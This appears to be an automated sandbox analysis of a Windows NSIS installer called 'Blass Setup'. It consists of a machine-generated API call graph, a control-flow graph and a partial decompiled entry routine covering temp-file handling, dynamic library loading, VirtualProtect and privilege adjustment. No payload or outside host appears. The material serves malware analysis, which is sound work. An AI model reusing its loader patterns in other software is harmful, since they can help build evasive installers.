4200->4206 4209 405662 4202->4209 4210 405654 4202->4210 4240 4041cd 4203->4240 4213 40551b 4205->4213 4214 40550d SendMessageW 4205->4214 4206->4205 4215 40563b 4207->4215 4216 40568f CreatePopupMenu 4207->4216 4212 4041cd SendMessageW 4209->4212 4211 4052c3 24 API calls 4210->4211 4211->4209 4212->4199 4235 4041f4 4213->4235 4214->4213 4217 406281 17 API calls 4216->4217 4219 40569f AppendMenuW 4217->4219 4221 4056bc GetWindowRect 4219->4221 4222 4056cf TrackPopupMenu 4219->4222 4220 40552b 4223 405534 ShowWindow 4220->4223 4224 405568 GetDlgItem SendMessageW 4220->4224 4221->4222 4222->4215 4226 4056ea 4222->4226 4227 405557 4223->4227 4228 40554a ShowWindow 4223->4228 4224->4215 4225 40558f SendMessageW SendMessageW 4224->4225 4225->4215 4229 405706 SendMessageW 4226->4229 4238 404229 SendMessageW 4227->4238 4228->4227 4229->4229 4230 405723 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4229->4230 4232 405748 SendMessageW 4230->4232 4232->4232 4233 405771 GlobalUnlock SetClipboardData CloseClipboard 4232->4233 4233->4215 4234->4194 4236 406281 17 API calls 4235->4236 4237 4041ff SetDlgItemTextW 4236->4237 4237->4220 4238->4224 4239->4195 4241 4041d4 4240->4241 4242 4041da SendMessageW 4240->4242 4241->4242 4242->4197 4244 4042fc 4243->4244 4245 404273 GetWindowLongW 4243->4245 4244->4215 4245->4244 4246 404284 4245->4246 4247 404293 GetSysColor 4246->4247 4248 404296 4246->4248 4247->4248 4249 4042a6 SetBkMode 4248->4249 4250 40429c SetTextColor 4248->4250 4251 4042c4 4249->4251 4252 4042be GetSysColor 4249->4252 4250->4249 4253 4042d5 4251->4253 4254 4042cb SetBkColor 4251->4254 4252->4251 4253->4244 4255 4042e8 DeleteObject 4253->4255 4256 4042ef CreateBrushIndirect 4253->4256 4254->4253 4255->4256 4256->4244 4264 404240 4257->4264 4259 4053e0 4260 404240 SendMessageW 4259->4260 4261 4053f2 OleUninitialize 4260->4261 4262 4053b9 4262->4259 4267 401389 4262->4267 4265 404258 4264->4265 4266 404249 SendMessageW 4264->4266 4265->4262 4266->4265 4269 401390 4267->4269 4268 4013fe 4268->4262 4269->4268 4270 4013cb MulDiv SendMessageW 4269->4270 4270->4269 4271 100027c2 4272 10002812 4271->4272 4273 100027d2 VirtualProtect 4271->4273 4273->4272 5342 401503 5343 40150b 5342->5343 5345 40151e 5342->5345 5344 402c15 17 API calls 5343->5344 5344->5345 5346 402306 5347 40230e 5346->5347 5351 402314 5346->5351 5348 402c37 17 API calls 5347->5348 5348->5351 5349 402c37 17 API calls 5350 402322 5349->5350 5352 402c37 17 API calls 5350->5352 5354 402330 5350->5354 5351->5349 5351->5350 5352->5354 5353 402c37 17 API calls 5355 402339 WritePrivateProfileStringW 5353->5355 5354->5353 5356 401f86 5357 402c37 17 API calls 5356->5357 5358 401f8d 5357->5358 5359 406639 5 API calls 5358->5359 5360 401f9c 5359->5360 5361 401fb8 GlobalAlloc 5360->5361 5363 402020 5360->5363 5362 401fcc 5361->5362 5361->5363 5364 406639 5 API calls 5362->5364 5365 401fd3 5364->5365 5366 406639 5 API calls 5365->5366 5367 401fdd 5366->5367 5367->5363 5371 4061a6 wsprintfW 5367->5371 5369 402012 5372 4061a6 wsprintfW 5369->5372 5371->5369 5372->5363 4313 402388 4314 402390 4313->4314 4315 4023bb 4313->4315 4325 402c77 4314->4325 4317 402c37 17 API calls 4315->4317 4318 4023c2 4317->4318 4330 402cf5 4318->4330 4321 4023a1 4323 402c37 17 API calls 4321->4323 4322 4023cf 4324 4023a8 RegDeleteValueW RegCloseKey 4323->4324 4324->4322 4326 402c37 17 API calls 4325->4326 4327 402c8e 4326->4327 4328 4060cc RegOpenKeyExW 4327->4328 4329 402397 4328->4329 4329->4321 4329->4322 4331 402d0b 4330->4331 4332 402d21 4331->4332 4334 402d2a 4331->4334 4332->4322 4335 4060cc RegOpenKeyExW 4334->4335 4336 402d58 4335->4336 4337 402d7e RegEnumKeyW 4336->4337 4338 402d95 RegCloseKey 4336->4338 4339 402db6 RegCloseKey 4336->4339 4341 402d2a 6 API calls 4336->4341 4344 402da9 4336->4344 4337->4336 4337->4338 4340 406639 5 API calls 4338->4340 4339->4344 4342 402da5 4340->4342 4341->4336 4343 402dc4 RegDeleteKeyW 4342->4343 4342->4344 4343->4344 4344->4332 5373 404308 lstrcpynW lstrlenW 5374 40190c 5375 401943 5374->5375 5376 402c37 17 API calls 5375->5376 5377 401948 5376->5377 5378 40596d 67 API calls 5377->5378 5379 401951 5378->5379 5380 401d0e 5381 402c15 17 API calls 5380->5381 5382 401d15 5381->5382 5383 402c15 17 API calls 5382->5383 5384 401d21 GetDlgItem 5383->5384 5385 40258c 5384->5385 5386 1000164f 5387 10001516 GlobalFree 5386->5387 5389 10001667 5387->5389 5388 100016ad GlobalFree 5389->5388 5390 10001682 5389->5390 5391 10001699 VirtualFree 5389->5391 5390->5388 5391->5388 5392 40190f 5393 402c37 17 API calls 5392->5393 5394 401916 5393->5394 5395 4058c1 MessageBoxIndirectW 5394->5395 5396 40191f 5395->5396 5397 401491 5398 4052c3 24 API calls 5397->5398 5399 401498 5398->5399 5400 404391 5401 4044c3 5400->5401 5402 4043a9 5400->5402 5403 40452d 5401->5403 5404 4045f7 5401->5404 5411 4044fe GetDlgItem SendMessageW 5401->5411 5406 4041f4 18 API calls 5402->5406 5403->5404 5405 404537 GetDlgItem 5403->5405 5410 40425b 8 API calls 5404->5410 5407 404551 5405->5407 5408 4045b8 5405->5408 5409 404410 5406->5409 5407->5408 5415 404577 SendMessageW LoadCursorW SetCursor 5407->5415 5408->5404 5416 4045ca 5408->5416 5413 4041f4 18 API calls 5409->5413 5414 4045f2 5410->5414 5433 404216 KiUserCallbackDispatcher 5411->5433 5418 40441d CheckDlgButton 5413->5418 5434 404640 5415->5434 5420 4045e0 5416->5420 5421 4045d0 SendMessageW 5416->5421 5417 404528 5422 40461c SendMessageW 5417->5422 5431 404216 KiUserCallbackDispatcher 5418->5431 5420->5414 5425 4045e6 SendMessageW 5420->5425 5421->5420 5422->5403 5425->5414 5426 40443b GetDlgItem 5432 404229 SendMessageW 5426->5432 5428 404451 SendMessageW 5429 404477 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5428->5429 5430 40446e GetSysColor 5428->5430 5429->5414 5430->5429 5431->5426 5432->5428 5433->5417 5437 405887 ShellExecuteExW 5434->5437 5436 4045a6 LoadCursorW SetCursor 5436->5408 5437->5436 5438 402592 5439 4025c1 5438->5439 5440 4025a6 5438->5440 5441 4025f5 5439->5441 5442 4025c6 5439->5442 5443 402c15 17 API calls 5440->5443 5445 402c37 17 API calls 5441->5445 5444 402c37 17 API calls 5442->5444 5451 4025ad 5443->5451 5446 4025cd WideCharToMultiByte lstrlenA 5444->5446 5447 4025fc lstrlenW 5445->5447 5446->5451 5447->5451 5448 40263f 5449 402629 5449->5448 5450 405e03 WriteFile 5449->5450 5450->5448 5451->5448 5451->5449 5452 405e32 5 API calls 5451->5452 5452->5449 5453 10001058 5455 10001074 5453->5455 5454 100010dd 5455->5454 5456 10001092 5455->5456 5457 10001516 GlobalFree 5455->5457 5458 10001516 GlobalFree 5456->5458 5457->5456 5459 100010a2 5458->5459 5460 100010b2 5459->5460 5461 100010a9 GlobalSize 5459->5461 5462 100010b6 GlobalAlloc 5460->5462 5464 100010c7 5460->5464 5461->5460 5463 1000153d 3 API calls 5462->5463 5463->5464 5465 100010d2 GlobalFree 5464->5465 5465->5454 5466 401c19 5467 402c15 17 API calls 5466->5467 5468 401c20 5467->5468 5469 402c15 17 API calls 5468->5469 5470 401c2d 5469->5470 5471 401c42 5470->5471 5472 402c37 17 API calls 5470->5472 5473 401c52 5471->5473 5474 402c37 17 API calls 5471->5474 5472->5471 5475 401ca9 5473->5475 5476 401c5d 5473->5476 5474->5473 5477 402c37 17 API calls 5475->5477 5478 402c15 17 API calls 5476->5478 5479 401cae 5477->5479 5480 401c62 5478->5480 5481 402c37 17 API calls 5479->5481 5482 402c15 17 API calls 5480->5482 5484 401cb7 FindWindowExW 5481->5484 5483 401c6e 5482->5483 5485 401c99 SendMessageW 5483->5485 5486 401c7b SendMessageTimeoutW 5483->5486 5487 401cd9 5484->5487 5485->5487 5486->5487 5488 404a19 5489 404a45 5488->5489 5490 404a29 5488->5490 5491 404a78 5489->5491 5492 404a4b SHGetPathFromIDListW 5489->5492 5499 4058a5 GetDlgItemTextW 5490->5499 5494 404a62 SendMessageW 5492->5494 5495 404a5b 5492->5495 5494->5491 5497 40140b 2 API calls 5495->5497 5496 404a36 SendMessageW 5496->5489 5497->5494 5499->5496 5500 402a9a SendMessageW 5501 402ab4 InvalidateRect 5500->5501 5502 402abf 5500->5502 5501->5502 4894 403d1b 4895 403d33 4894->4895 4896 403e6e 4894->4896 4895->4896 4897 403d3f 4895->4897 4898 403ebf 4896->4898 4899 403e7f GetDlgItem GetDlgItem 4896->4899 4900 403d4a SetWindowPos 4897->4900 4901 403d5d 4897->4901 4903 403f19 4898->4903 4912 401389 2 API calls 4898->4912 4902 4041f4 18 API calls 4899->4902 4900->4901 4905 403d62 ShowWindow 4901->4905 4906 403d7a 4901->4906 4907 403ea9 SetClassLongW 4902->4907 4904 404240 SendMessageW 4903->4904 4908 403e69 4903->4908 4935 403f2b 4904->4935 4905->4906 4909 403d82 DestroyWindow 4906->4909 4910 403d9c 4906->4910 4911 40140b 2 API calls 4907->4911 4914 40417d 4909->4914 4915 403da1 SetWindowLongW 4910->4915 4916 403db2 4910->4916 4911->4898 4913 403ef1 4912->4913 4913->4903 4917 403ef5 SendMessageW 4913->4917 4914->4908 4923 4041ae ShowWindow 4914->4923 4915->4908 4920 403e5b 4916->4920 4921 403dbe GetDlgItem 4916->4921 4917->4908 4918 40140b 2 API calls 4918->4935 4919 40417f DestroyWindow EndDialog 4919->4914 4922 40425b 8 API calls 4920->4922 4924 403dd1 SendMessageW IsWindowEnabled 4921->4924 4925 403dee 4921->4925 4922->4908 4923->4908 4924->4908 4924->4925 4927 403dfb 4925->4927 4928 403e42 SendMessageW 4925->4928 4929 403e0e 4925->4929 4939 403df3 4925->4939 4926 406281 17 API calls 4926->4935 4927->4928 4927->4939 4928->4920 4932 403e16 4929->4932 4933 403e2b 4929->4933 4930 4041cd SendMessageW 4934 403e29 4930->4934 4931 4041f4 18 API calls 4931->4935 4936 40140b 2 API calls 4932->4936 4937 40140b 2 API calls 4933->4937 4934->4920 4935->4908 4935->4918 4935->4919 4935->4926 4935->4931 4940 4041f4 18 API calls 4935->4940 4956 4040bf DestroyWindow 4935->4956 4936->4939 4938 403e32 4937->4938 4938->4920 4938->4939 4939->4930 4941 403fa6 GetDlgItem 4940->4941 4942 403fc3 ShowWindow KiUserCallbackDispatcher 4941->4942 4943 403fbb 4941->4943 4965 404216 KiUserCallbackDispatcher 4942->4965 4943->4942 4945 403fed EnableWindow 4950 404001 4945->4950 4946 404006 GetSystemMenu EnableMenuItem SendMessageW 4947 404036 SendMessageW 4946->4947 4946->4950 4947->4950 4949 403cfc 18 API calls 4949->4950 4950->4946 4950->4949 4966 404229 SendMessageW 4950->4966 4967 40625f lstrcpynW 4950->4967 4952 404065 lstrlenW 4953 406281 17 API calls 4952->4953 4954 40407b SetWindowTextW 4953->4954 4955 401389 2 API calls 4954->4955 4955->4935 4956->4914 4957 4040d9 CreateDialogParamW 4956->4957 4957->4914 4958 40410c 4957->4958 4959 4041f4 18 API calls 4958->4959 4960 404117 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4959->4960 4961 401389 2 API calls 4960->4961 4962 40415d 4961->4962 4962->4908 4963 404165 ShowWindow 4962->4963 4964 404240 SendMessageW 4963->4964 4964->4914 4965->4945 4966->4950 4967->4952 5503 40281b 5504 402821 5503->5504 5505 402829 FindClose 5504->5505 5506 402abf 5504->5506 5505->5506 5507 40149e 5508 4022f1 5507->5508 5509 4014ac PostQuitMessage 5507->5509 5509->5508 5510 100010e1 5512 10001111 5510->5512 5511 100011d8 GlobalFree 5512->5511 5513 100012ba 2 API calls 5512->5513 5514 100011d3 5512->5514 5515 10001272 2 API calls 5512->5515 5516 10001164 GlobalAlloc 5512->5516 5517 100011f8 GlobalFree 5512->5517 5518 100011c4 GlobalFree 5512->5518 5519 100012e1 lstrcpyW 5512->5519 5513->5512 5514->5511 5515->5518 5516->5512 5517->5512 5518->5512 5519->5512 5520 4029a2 5521 402c15 17 API calls 5520->5521 5522 4029a8 5521->5522 5523 4029e8 5522->5523 5524 4029cf 5522->5524 5529 402885 5522->5529 5527 402a02 5523->5527 5528 4029f2 5523->5528 5525 4029d4 5524->5525 5526 4029e5 5524->5526 5534 40625f lstrcpynW 5525->5534 5526->5529 5535 4061a6 wsprintfW 5526->5535 5531 406281 17 API calls 5527->5531 5530 402c15 17 API calls 5528->5530 5530->5526 5531->5526 5534->5529 5535->5529 4285 4015a3 4286 402c37 17 API calls 4285->4286 4287 4015aa SetFileAttributesW 4286->4287 4288 4015bc 4287->4288 5536 4028a7 5537 402c37 17 API calls 5536->5537 5538 4028b5 5537->5538 5539 4028cb 5538->5539 5540 402c37 17 API calls 5538->5540 5541 405d2c 2 API calls 5539->5541 5540->5539 5542 4028d1 5541->5542 5564 405d51 GetFileAttributesW CreateFileW 5542->5564 5544 4028de 5545 402981 5544->5545 5546 4028ea GlobalAlloc 5544->5546 5547 402989 DeleteFileW 5545->5547 5548 40299c 5545->5548 5549 402903 5546->5549 5550 402978 CloseHandle 5546->5550 5547->5548 5565 403308 SetFilePointer 5549->5565 5550->5545 5552 402909 5553 4032f2 ReadFile 5552->5553 5554 402912 GlobalAlloc 5553->5554 5555 402922 5554->5555 5556 402956 5554->5556 5557 4030fa 31 API calls 5555->5557 5558 405e03 WriteFile 5556->5558 5563 40292f 5557->5563 5559 402962 GlobalFree 5558->5559 5560 4030fa 31 API calls 5559->5560 5562 402975 5560->5562 5561 40294d GlobalFree 5561->5556 5562->5550 5563->5561 5564->5544 5565->5552 5566 40392b 5567 403936 5566->5567 5568 40393a 5567->5568 5569 40393d GlobalAlloc 5567->5569 5569->5568 4357 40202c 4358 4020f0 4357->4358 4359 40203e 4357->4359 4362 401423 24 API calls 4358->4362 4360 402c37 17 API calls 4359->4360 4361 402045 4360->4361 4363 402c37 17 API calls 4361->4363 4367 40224a 4362->4367 4364 40204e 4363->4364 4365 402064 LoadLibraryExW 4364->4365 4366 402056 GetModuleHandleW 4364->4366 4365->4358 4368 402075 4365->4368 4366->4365 4366->4368 4380 4066a8 WideCharToMultiByte 4368->4380 4371 402086 4373 4020a5 4371->4373 4374 40208e 4371->4374 4372 4020bf 4375 4052c3 24 API calls 4372->4375 4383 10001759 4373->4383 4376 401423 24 API calls 4374->4376 4377 402096 4375->4377 4376->4377 4377->4367 4378 4020e2 FreeLibrary 4377->4378 4378->4367 4381 4066d2 GetProcAddress 4380->4381 4382 402080 4380->4382 4381->4382 4382->4371 4382->4372 4384 10001789 4383->4384 4425 10001b18 4384->4425 4386 10001790 4387 100018a6 4386->4387 4388 100017a1 4386->4388 4389 100017a8 4386->4389 4387->4377 4473 10002286 4388->4473 4457 100022d0 4389->4457 4394 1000180c 4400 10001812 4394->4400 4401 1000184e 4394->4401 4395 100017ee 4486 100024a4 4395->4486 4396 100017d7 4410 100017cd 4396->4410 4483 10002b57 4396->4483 4397 100017be 4399 100017c4 4397->4399 4405 100017cf 4397->4405 4399->4410 4467 1000289c 4399->4467 4407 100015b4 3 API calls 4400->4407 4403 100024a4 10 API calls 4401->4403 4408 10001840 4403->4408 4404 100017f4 4497 100015b4 4404->4497 4477 10002640 4405->4477 4412 10001828 4407->4412 4416 10001895 4408->4416 4508 10002467 4408->4508 4410->4394 4410->4395 4413 100024a4 10 API calls 4412->4413 4413->4408 4415 100017d5 4415->4410 4416->4387 4418 1000189f GlobalFree 4416->4418 4418->4387 4422 10001881 4422->4416 4512 1000153d wsprintfW 4422->4512 4423 1000187a FreeLibrary 4423->4422 4515 1000121b GlobalAlloc 4425->4515 4427 10001b3c 4516 1000121b GlobalAlloc 4427->4516 4429 10001d7a GlobalFree GlobalFree GlobalFree 4430 10001d97 4429->4430 4451 10001de1 4429->4451 4431 100020ee 4430->4431 4440 10001dac 4430->4440 4430->4451 4433 10002110 GetModuleHandleW 4431->4433 4431->4451 4432 10001c1d GlobalAlloc 4444 10001b47 4432->4444 4435 10002121 LoadLibraryW 4433->4435 4436 10002136 4433->4436 4434 10001c86 GlobalFree 4434->4444 4435->4436 4435->4451 4523 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4436->4523 4437 10001c68 lstrcpyW 4438 10001c72 lstrcpyW 4437->4438 4438->4444 4440->4451 4519 1000122c 4440->4519 4441 10002188 4442 10002195 lstrlenW 4441->4442 4441->4451 4524 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4442->4524 4444->4429 4444->4432 4444->4434 4444->4437 4444->4438 4447 10002048 4444->4447 4444->4451 4452 10001f37 GlobalFree 4444->4452 4453 1000122c 2 API calls 4444->4453 4456 10001cc4 4444->4456 4522 1000121b GlobalAlloc 4444->4522 4445 10002148 4445->4441 4455 10002172 GetProcAddress 4445->4455 4450 10002090 lstrcpyW 4447->4450 4447->4451 4449 100021af 4449->4451 4450->4451 4451->4386 4452->4444 4453->4444 4455->4441 4456->4444 4517 1000158f GlobalSize GlobalAlloc 4456->4517 4464 100022e8 4457->4464 4458 1000122c GlobalAlloc lstrcpynW 4458->4464 4460 10002410 GlobalFree 4463 100017ae 4460->4463 4460->4464 4461 100023ba GlobalAlloc CLSIDFromString 4461->4460 4462 1000238f GlobalAlloc WideCharToMultiByte 4462->4460 4463->4396 4463->4397 4463->4410 4464->4458 4464->4460 4464->4461 4464->4462 4465 100023d9 4464->4465 4526 100012ba 4464->4526 4465->4460 4530 100025d4 4465->4530 4469 100028ae 4467->4469 4468 10002953 CreateFileA 4470 10002971 4468->4470 4469->4468 4471 10002a62 GetLastError 4470->4471 4472 10002a6d 4470->4472 4471->4472 4472->4410 4474 10002296 4473->4474 4475 100017a7 4473->4475 4474->4475 4476 100022a8 GlobalAlloc 4474->4476 4475->4389 4476->4474 4481 1000265c 4477->4481 4478 100026c0 4480 100026c5 GlobalSize 4478->4480 4482 100026cf 4478->4482 4479 100026ad GlobalAlloc 4479->4482 4480->4482 4481->4478 4481->4479 4482->4415 4484 10002b62 4483->4484 4485 10002ba2 GlobalFree 4484->4485 4533 1000121b GlobalAlloc 4486->4533 4488 10002506 MultiByteToWideChar 4492 100024ae 4488->4492 4489 1000252b StringFromGUID2 4489->4492 4490 1000253c lstrcpynW 4490->4492 4491 1000254f wsprintfW 4491->4492 4492->4488 4492->4489 4492->4490 4492->4491 4493 1000256c GlobalFree 4492->4493 4494 100025a7 GlobalFree 4492->4494 4495 10001272 2 API calls 4492->4495 4534 100012e1 4492->4534 4493->4492 4494->4404 4495->4492 4538 1000121b GlobalAlloc 4497->4538 4499 100015ba 4500 100015c7 lstrcpyW 4499->4500 4502 100015e1 4499->4502 4503 100015fb 4500->4503 4502->4503 4504 100015e6 wsprintfW 4502->4504 4505 10001272 4503->4505 4504->4503 4506 100012b5 GlobalFree 4505->4506 4507 1000127b GlobalAlloc lstrcpynW 4505->4507 4506->4408 4507->4506 4509 10001861 4508->4509 4510 10002475 4508->4510 4509->4422 4509->4423 4510->4509 4511 10002491 GlobalFree 4510->4511 4511->4510 4513 10001272 2 API calls 4512->4513 4514 1000155e 4513->4514 4514->4416 4515->4427 4516->4444 4518 100015ad 4517->4518 4518->4456 4525 1000121b GlobalAlloc 4519->4525 4521 1000123b lstrcpynW 4521->4451 4522->4444 4523->4445 4524->4449 4525->4521 4527 100012c1 4526->4527 4528 1000122c 2 API calls 4527->4528 4529 100012df 4528->4529 4529->4464 4531 100025e2 VirtualAlloc 4530->4531 4532 10002638 4530->4532 4531->4532 4532->4465 4533->4492 4535 100012ea 4534->4535 4536 1000130c 4534->4536 4535->4536 4537 100012f0 lstrcpyW 4535->4537 4536->4492 4537->4536 4538->4499 5570 402a2f 5571 402c15 17 API calls 5570->5571 5572 402a35 5571->5572 5573 402a6c 5572->5573 5574 402885 5572->5574 5576 402a47 5572->5576 5573->5574 5575 406281 17 API calls 5573->5575 5575->5574 5576->5574 5578 4061a6 wsprintfW 5576->5578 5578->5574 5579 401a30 5580 402c37 17 API calls 5579->5580 5581 401a39 ExpandEnvironmentStringsW 5580->5581 5582 401a4d 5581->5582 5584 401a60 5581->5584 5583 401a52 lstrcmpW 5582->5583 5582->5584 5583->5584 5590 401db3 GetDC 5591 402c15 17 API calls 5590->5591 5592 401dc5 GetDeviceCaps MulDiv ReleaseDC 5591->5592 5593 402c15 17 API calls 5592->5593 5594 401df6 5593->5594 5595 406281 17 API calls 5594->5595 5596 401e33 CreateFontIndirectW 5595->5596 5597 40258c 5596->5597 4887 401735 4888 402c37 17 API calls 4887->4888 4889 40173c SearchPathW 4888->4889 4890 4029e0 4889->4890 4891 401757 4889->4891 4891->4890 4893 40625f lstrcpynW 4891->4893 4893->4890 5598 402835 5599 40283d 5598->5599 5600 402841 FindNextFileW 5599->5600 5601 402853 5599->5601 5600->5601 5602 4029e0 5601->5602 5604 40625f lstrcpynW 5601->5604 5604->5602 5605 10002a77 5606 10002a8f 5605->5606 5607 1000158f 2 API calls 5606->5607 5608 10002aaa 5607->5608 5609 405237 5610 405247 5609->5610 5611 40525b 5609->5611 5612 4052a4 5610->5612 5613 40524d 5610->5613 5614 405263 IsWindowVisible 5611->5614 5620 40527a 5611->5620 5615 4052a9 CallWindowProcW 5612->5615 5616 404240 SendMessageW 5613->5616 5614->5612 5617 405270 5614->5617 5618 405257 5615->5618 5616->5618 5622 404b8d SendMessageW 5617->5622 5620->5615 5627 404c0d 5620->5627 5623 404bb0 GetMessagePos ScreenToClient SendMessageW 5622->5623 5624 404bec SendMessageW 5622->5624 5625 404be4 5623->5625 5626 404be9 5623->5626 5624->5625 5625->5620 5626->5624 5636 40625f lstrcpynW 5627->5636 5629 404c20 5637 4061a6 wsprintfW 5629->5637 5631 404c2a 5632 40140b 2 API calls 5631->5632 5633 404c33 5632->5633 5638 40625f lstrcpynW 5633->5638 5635 404c3a 5635->5612 5636->5629 5637->5631 5638->5635 5639 4014b8 5640 4014be 5639->5640 5641 401389 2 API calls 5640->5641 5642 4014c6 5641->5642 5643 404c3f GetDlgItem GetDlgItem 5644 404c91 7 API calls 5643->5644 5648 404eaa 5643->5648 5645 404d34 DeleteObject 5644->5645 5646 404d27 SendMessageW 5644->5646 5647 404d3d 5645->5647 5646->5645 5649 404d74 5647->5649 5651 406281 17 API calls 5647->5651 5650 404f8e 5648->5650 5661 404b8d 5 API calls 5648->5661 5677 404f1b 5648->5677 5652 4041f4 18 API calls 5649->5652 5653 40503a 5650->5653 5658 404e9d 5650->5658 5663 404fe7 SendMessageW 5650->5663 5654 404d56 SendMessageW SendMessageW 5651->5654 5657 404d88 5652->5657 5655 405044 SendMessageW 5653->5655 5656 40504c 5653->5656 5654->5647 5655->5656 5665 405065 5656->5665 5666 40505e ImageList_Destroy 5656->5666 5673 405075 5656->5673 5662 4041f4 18 API calls 5657->5662 5659 40425b 8 API calls 5658->5659 5664 405230 5659->5664 5660 404f80 SendMessageW 5660->5650 5661->5677 5678 404d96 5662->5678 5663->5658 5668 404ffc SendMessageW 5663->5668 5669 40506e GlobalFree 5665->5669 5665->5673 5666->5665 5667 4051e4 5667->5658 5674 4051f6 ShowWindow GetDlgItem ShowWindow 5667->5674 5671 40500f 5668->5671 5669->5673 5670 404e6b GetWindowLongW SetWindowLongW 5672 404e84 5670->5672 5679 405020 SendMessageW 5671->5679 5675 404ea2 5672->5675 5676 404e8a ShowWindow 5672->5676 5673->5667 5686 404c0d 4 API calls 5673->5686 5689 4050b0 5673->5689 5674->5658 5695 404229 SendMessageW 5675->5695 5694 404229 SendMessageW 5676->5694 5677->5650 5677->5660 5678->5670 5680 404e65 5678->5680 5683 404de6 SendMessageW 5678->5683 5684 404e22 SendMessageW 5678->5684 5685 404e33 SendMessageW 5678->5685 5679->5653 5680->5670 5680->5672 5683->5678 5684->5678 5685->5678 5686->5689 5687 4051ba InvalidateRect 5687->5667 5688 4051d0 5687->5688 5692 404b48 20 API calls 5688->5692 5690 4050de SendMessageW 5689->5690 5691 4050f4 5689->5691 5690->5691 5691->5687 5693 405168 SendMessageW SendMessageW 5691->5693 5692->5667 5693->5691 5694->5658 5695->5648

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 0 403350-40338d SetErrorMode GetVersion 1 4033a0 0->1 2 40338f-403397 call 406639 0->2 3 4033a5-4033b9 call 4065c9 lstrlenA 1->3 2->1 8 403399 2->8 9 4033bb-4033d7 call 406639 * 3 3->9 8->1 16 4033e8-403449 #17 OleInitialize SHGetFileInfoW call 40625f GetCommandLineW call 40625f GetModuleHandleW 9->16 17 4033d9-4033df 9->17 24 403453-40346d call 405b5d CharNextW 16->24 25 40344b-403452 16->25 17->16 22 4033e1 17->22 22->16 28 403473-403479 24->28 29 403584-40359e GetTempPathW call 40331f 24->29 25->24 31 403482-403486 28->31 32 40347b-403480 28->32 36 4035a0-4035be GetWindowsDirectoryW lstrcatW call 40331f 29->36 37 4035f6-403610 DeleteFileW call 402ec1 29->37 34 403488-40348c 31->34 35 40348d-403491 31->35 32->31 32->32 34->35 38 403550-40355d call 405b5d 35->38 39 403497-40349d 35->39 36->37 54 4035c0-4035f0 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40331f 36->54 57 4036c1-4036d1 call 403893 OleUninitialize 37->57 58 403616-40361c 37->58 55 403561-403567 38->55 56 40355f-403560 38->56 43 4034b8-4034f1 39->43 44 40349f-4034a7 39->44 45 4034f3-4034f8 43->45 46 40350e-403548 43->46 50 4034a9-4034ac 44->50 51 4034ae 44->51 45->46 52 4034fa-403502 45->52 46->38 53 40354a-40354e 46->53 50->43 50->51 51->43 60 403504-403507 52->60 61 403509 52->61 53->38 62 40356f-40357d call 40625f 53->62 54->37 54->57 55->28 64 40356d 55->64 56->55 75 4037f7-4037fd 57->75 76 4036d7-4036e7 call 4058c1 ExitProcess 57->76 65 4036b1-4036b8 call 40396d 58->65 66 403622-40362d call 405b5d 58->66 60->46 60->61 61->46 70 403582 62->70 64->70 74 4036bd 65->74 77 40367b-403685 66->77 78 40362f-403664 66->78 70->29 74->57 80 40387b-403883 75->80 81 4037ff-403815 GetCurrentProcess OpenProcessToken 75->81 85 403687-403695 call 405c38 77->85 86 4036ed-403701 call 40582c lstrcatW 77->86 82 403666-40366a 78->82 83 403885 80->83 84 403889-40388d ExitProcess 80->84 88 403817-403845 LookupPrivilegeValueW AdjustTokenPrivileges 81->88 89 40384b-403859 call 406639 81->89 90 403673-403677 82->90 91 40366c-403671 82->91 83->84 85->57 99 403697-4036ad call 40625f * 2 85->99 100 403703-403709 lstrcatW 86->100 101 40370e-403728 lstrcatW lstrcmpiW 86->101 88->89 102 403867-403872 ExitWindowsEx 89->102 103 40385b-403865 89->103 90->82 95 403679 90->95 91->90 91->95 95->77 99->65 100->101 101->57 106 40372a-40372d 101->106 102->80 104 403874-403876 call 40140b 102->104 103->102 103->104 104->80 110 403736 call 40580f 106->110 111 40372f-403734 call 405792 106->111 116 40373b-403749 SetCurrentDirectoryW 110->116 111->116 118 403756-40377f call 40625f 116->118 119 40374b-403751 call 40625f 116->119 123 403784-4037a0 call 406281 DeleteFileW 118->123 119->118 126 4037e1-4037e9 123->126 127 4037a2-4037b2 CopyFileW 123->127 126->123 128 4037eb-4037f2 call 406025 126->128 127->126 129 4037b4-4037d4 call 406025 call 406281 call 405844 127->129 128->57 129->126 138 4037d6-4037dd CloseHandle 129->138 138->126
                                        C-Code - Quality: 81%
                                        			_entry_() {
                                        				signed int _t51;
                                        				intOrPtr* _t56;
                                        				WCHAR* _t60;
                                        				char* _t63;
                                        				void* _t66;
                                        				void* _t68;
                                        				int _t70;
                                        				int _t72;
                                        				int _t75;
                                        				intOrPtr* _t76;
                                        				int _t77;
                                        				int _t79;
                                        				void* _t103;
                                        				signed int _t120;
                                        				void* _t123;
                                        				void* _t128;
                                        				intOrPtr _t147;
                                        				intOrPtr _t148;
                                        				intOrPtr* _t149;
                                        				int _t151;
                                        				void* _t154;
                                        				int _t155;
                                        				signed int _t159;
                                        				signed int _t164;
                                        				signed int _t169;
                                        				void* _t171;
                                        				WCHAR* _t172;
                                        				signed int _t175;
                                        				signed int _t178;
                                        				CHAR* _t179;
                                        				void* _t182;
                                        				int* _t184;
                                        				void* _t192;
                                        				char* _t193;
                                        				void* _t196;
                                        				void* _t197;
                                        				void* _t243;
                                        
                                        				_t171 = 0x20;
                                        				_t151 = 0;
                                        				 *(_t197 + 0x14) = 0;
                                        				 *(_t197 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
                                        				 *(_t197 + 0x1c) = 0;
                                        				SetErrorMode(0x8001); // executed
                                        				_t51 = GetVersion() & 0xbfffffff;
                                        				 *0x7a8a2c = _t51;
                                        				if(_t51 != 6) {
                                        					_t149 = E00406639(0);
                                        					if(_t149 != 0) {
                                        						 *_t149(0xc00);
                                        					}
                                        				}
                                        				_t179 = "UXTHEME";
                                        				goto L4;
                                        				L8:
                                        				__imp__#17(_t192);
                                        				__imp__OleInitialize(_t151); // executed
                                        				 *0x7a8af8 = _t56;
                                        				SHGetFileInfoW(0x79fee0, _t151, _t197 + 0x34, 0x2b4, _t151); // executed
                                        				E0040625F("Blass Setup", L"NSIS Error");
                                        				_t60 = GetCommandLineW();
